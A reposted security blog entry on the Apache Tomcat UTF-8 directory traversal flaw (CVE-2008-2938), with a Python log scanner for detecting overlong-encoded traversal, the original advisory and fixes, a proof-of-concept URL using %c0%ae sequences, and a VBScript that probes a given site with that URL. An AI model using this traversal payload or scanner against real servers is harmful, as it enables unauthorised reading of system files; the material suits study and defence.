Apache Tomcat UTF-8 Encoding Vulnerability [reposted from 邪恶八进制]
2009-01-15 19:53
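Apache Tomcat has a vulnerability similar to the old IIS URL-encoding flaw. It arises when Apache Tomcat processes UTF-8 encoding and fails to convert it correctly, so that a URL containing %c0%ae%c0%ae is converted into something like ../, which makes it possible to traverse to arbitrary files on the system, including /etc/passwd.
The trigger condition is that Apache Tomcat's configuration file context.xml or server.xml enables 'allowLinking' and sets 'URIencoding' to 'UTF-8'.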
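The decoding flaw described above can be turned into a log check. The following is an added example, not part of the original post or of Tomcat: it decodes request paths the way a non-strict UTF-8 decoder would (accepting overlong forms, generalized here to 3- and 4-byte sequences) and flags paths where ".." only appears after that lenient decoding. The function names and the access-log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

def lenient_decode(raw: bytes) -> str:
    """UTF-8 decode that, like the flawed decoder, accepts overlong forms."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        # continuation bytes announced by the lead byte (-1 = not a lead byte)
        n = 0 if b < 0x80 else 1 if b >> 5 == 6 else 2 if b >> 4 == 14 else 3 if b >> 3 == 30 else -1
        tail = raw[i + 1:i + 1 + n]
        if n < 0 or len(tail) != n or any(t & 0xC0 != 0x80 for t in tail):
            out.append("\ufffd")      # malformed byte: substitute and resync
            i += 1
            continue
        cp = b if n == 0 else b & (0x3F >> n)   # payload bits of the lead byte
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += n + 1
    return "".join(out)

def has_dotdot(path: str) -> bool:
    return ".." in path.split("/")

def classify(uri: str) -> str:
    raw = unquote_to_bytes(uri.split("?", 1)[0])   # percent-decode the path only
    if has_dotdot(raw.decode("latin-1")):
        return "plain-traversal"
    if has_dotdot(lenient_decode(raw)):
        return "overlong-traversal"   # ".." exists only after lenient decoding
    try:
        raw.decode("utf-8")           # strict decoder rejects overlong sequences
    except UnicodeDecodeError:
        return "invalid-utf8"
    return "clean"

REQ = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/')

def scan(log: str):
    """Return (client, verdict) for every request line that is not clean."""
    hits = []
    for line in log.splitlines():
        m = REQ.match(line)
        if m and (verdict := classify(m.group(2))) != "clean":
            hits.append((m.group(1), verdict))
    return hits

# Constructed sample access-log lines (documentation IP range).
SAMPLE_LOG = """192.0.2.10 - - [11/Aug/2008:10:00:01 +0000] "GET /index.jsp HTTP/1.1" 200 512
192.0.2.11 - - [11/Aug/2008:10:00:02 +0000] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar HTTP/1.1" 200 1024
192.0.2.12 - - [11/Aug/2008:10:00:03 +0000] "GET /docs/%e4%b8%ad%e6%96%87.html HTTP/1.1" 200 2048
192.0.2.13 - - [11/Aug/2008:10:00:04 +0000] "GET /a/../b HTTP/1.1" 404 0"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 response on an "overlong-traversal" line is the case worth investigating first, since it suggests the server served something for the decoded path.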
    Title: Apache Tomcat Directory Traversal Vulnerability
    Author: Simon Ryeo (bar4mi (at) gmail.com, barami (at) ahnlab.com)
    Severity: High
    Impact: Remote File Disclosure
    Vulnerable Version: prior to 6.0.18
    Solution:
     - Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)
     - Hot fix: Disable allowLinking or do not set URIencoding to utf8
       in order to avoid this vulnerability.
     - Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next
       releases. Please apply the hot fix until next release.
    References:
     - http://tomcat.apache.org/security.html
     - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
    History:
     - 07.17.2008: Initiate notify (To Apache Security Team)
     - 08.02.2008: Responded this problem fixed and released new version
     - 08.05.2008: Notify disclosure (To Apache Tomcat Security Team)
     - 08.10.2008: Responded with some suggestions.

    Description
    As Apache Security Team, this problem occurs because of JAVA side.
    If your context.xml or server.xml allows 'allowLinking' and 'URIencoding'
    as 'UTF-8', an attacker can obtain your important system files.
    (e.g. /etc/passwd)

    Exploit
    If your webroot directory has three depth (e.g. /usr/local/wwwroot),
    an attacker can access arbitrary files as below. (Proof-of-concept)

    http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar

    # milw0rm.com [2008-08-11]
VBS test version:
    Dim strUrl, strSite
    showB()

    ' Expect exactly one argument: the base URL of the site to test
    Set Args = Wscript.Arguments
    If Args.Count <> 1 Then
        ShowU()
    Else
        strSite = Args(0)
    End If

    ' Request path from the advisory's proof-of-concept
    strUrl = "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar"
    Set objXML = CreateObject("Microsoft.XMLHTTP")
    objXML.Open "GET", strSite & strUrl, False
    objXML.SetRequestHeader "Referer", strSite
    objXML.send()

    ' An HTTP 200 response is reported as "存在漏洞" ("vulnerable")
    If objXML.status = 200 Then
        wscript.echo("存在漏洞")
    End If

    ' Banner
    Sub showB()
        With Wscript
            .Echo("+--------------------------=====================------------------------------+")
            .Echo("Exploit Apache Tomcat UTF-8")
            .Echo("Code By Safe3")
            .Echo("+--------------------------=====================------------------------------+")
        End With
    End Sub

    ' Usage text ("用法" = usage, "例子" = example), then exit
    Sub showU()
        With Wscript
            .Echo("+--------------------------=====================------------------------------+")
            .Echo("用法:")
            .Echo(" cscript "&.ScriptName&" site")
            .Echo("例子:")
            .Echo(" cscript "&.ScriptName&" http://www.example.com >result.txt")
            .Echo("+--------------------------=====================------------------------------+")
            .Quit
        End With
    End Sub